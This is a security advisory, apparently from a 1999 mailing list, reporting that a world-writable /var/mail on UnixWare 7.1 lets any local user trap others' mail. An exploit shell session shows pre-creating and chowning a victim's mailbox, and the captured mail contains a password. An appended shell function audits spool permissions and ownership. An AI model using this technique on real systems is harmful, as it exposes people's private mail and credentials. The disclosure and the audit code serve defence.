Greetings,

OVERVIEW

Any user can read/modify others' mail.

BACKGROUND

Only UnixWare 7.1 was tested.

DETAILS

Imagine my surprise when I saw that /var/mail was mode 777. As such, any user may create a file called /var/mail/ with a mode readable by him and trap all incoming mail. Afraid of getting caught? chown the file to (see my advisory on this subject), leaving it still world-readable, and no one will ever know who did it.

All of this assumes, of course, that the user has not received any mail yet. If you keep track of your /etc/passwd file, you can monitor for new entries and create the files as needed.

This permissions problem obviously opens the door for all sorts of problems with symlinks and such. I would imagine that some mail delivery programs which aren't as smart as sendmail will follow symlinks in /var/mail.

And as if all this wasn't bad enough, UnixWare's /usr/bin/mail is a BIG LIE:

    bash-2.02$ cat /usr/bin/mail
    #!/bin/sh
    cat > /dev/null
    exit 0
    bash-2.02$

;)

EXPLOIT

    bash-2.02$ id
    uid=106(xnec) gid=1(other)
    bash-2.02$ pwd
    /var/mail
    bash-2.02$ touch btellier
    bash-2.02$ chown btellier btellier
    bash-2.02$ ls -la btellier
    -rw-r--r-- 1 btellier other 0 Dec 4 07:54 btellier

Now wait for btellier to get some mail...

    bash-2.02$ ls -la btellier
    -rw-r--r-- 1 btellier other 410 Dec 4 07:55 btellier
    bash-2.02$ cat btellier
    From root Sat Dec 4 07:55:29 1999
    Return-Path: root
    Received: (from root@localhost)
            by localhost (8.8.7/UW7.1.0) id HAA04842
            for btellier; Sat, 4 Dec 1999 07:55:29 -0600 (CST)
    Date: Sat, 4 Dec 1999 07:55:29 -0600 (CST)
    From: root@localhost
    Message-Id: <199912041355.HAA04842@localhost>
    Status:
    X-Status:
    X-SCO-PAD: XXXXXX
    X-SCO-UID: 1
    Content-Length: 52

    your ueber-secure password on 0wned.com is a@f9;se0
    bash-2.02$

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
btellier@usa.net
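An administrator can check a spool for the conditions this advisory describes with a short audit function. This is an added example, not part of the original post; the function name `audit_spool` and the finding labels are made up for illustration, and it assumes each mailbox file is named after the account that should own it, as in the `/var/mail/btellier` session above.

```shell
#!/bin/sh
# Added example: audit a mail spool for the weaknesses in the advisory.
# Assumption: a mailbox file is named after the user who should own it.

audit_spool() {
    dir=${1:-/var/mail}
    findings=0

    # World-writable spool without the sticky bit: any local user can create
    # a mailbox for someone else before the first delivery happens.
    # "$dir/." makes find test the directory itself even if $dir is a symlink.
    if [ -n "$(find "$dir/." -prune -type d -perm -0002 ! -perm -1000 2>/dev/null)" ]; then
        echo "DIR_WORLD_WRITABLE_NO_STICKY $dir"
        findings=$((findings + 1))
    fi

    for f in "$dir"/*; do
        [ -e "$f" ] || [ -L "$f" ] || continue   # glob matched nothing
        name=${f##*/}

        # A symlink in the spool can redirect a delivery agent that follows it.
        if [ -L "$f" ]; then
            echo "SYMLINK $f"
            findings=$((findings + 1))
            continue
        fi
        [ -f "$f" ] || continue

        # Owner must match the mailbox name.
        owner=$(ls -ld "$f" | awk '{print $3}')
        if [ "$owner" != "$name" ]; then
            echo "OWNER_MISMATCH $f owner=$owner"
            findings=$((findings + 1))
        fi

        # The advisory's trap survives a chown because the file stays
        # world-readable, so check the mode independently of the owner.
        if [ -n "$(find "$f" -prune -perm -0004 2>/dev/null)" ]; then
            echo "WORLD_READABLE $f"
            findings=$((findings + 1))
        fi
    done

    [ "$findings" -eq 0 ]   # exit status 0 only when the spool is clean
}
# Usage: audit_spool /var/mail
```

The function prints one line per finding and returns non-zero if anything was flagged, so it can run from cron and alert on output.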